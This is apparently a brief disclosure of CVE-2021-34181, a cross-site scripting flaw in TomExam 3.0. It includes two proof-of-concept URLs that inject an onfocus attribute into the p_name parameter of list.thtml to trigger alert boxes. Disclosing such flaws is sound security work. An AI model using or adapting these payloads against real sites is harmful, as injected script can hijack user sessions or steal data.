Headline
CVE-2021-34181: Cross Site Scripting (XSS) vulnerability in TomExam 3.0 via p_name parameter to list.thtml - mrhonest
Cross Site Scripting (XSS) vulnerability in TomExam 3.0 via p_name parameter to list.thtml.
Cross Site Scripting (XSS) vulnerability in TomExam 3.0 via p_name parameter to list.thtml
An authenticated account is required
Login succeeded
user/paper/list.thtml?p_name=%22autofocus+onfocus%3D%22alert%281%29&p_cid=
user/paper/list.thtml?p_name=%22autofocus%20onfocus=%22alert(document.title)&p_cid=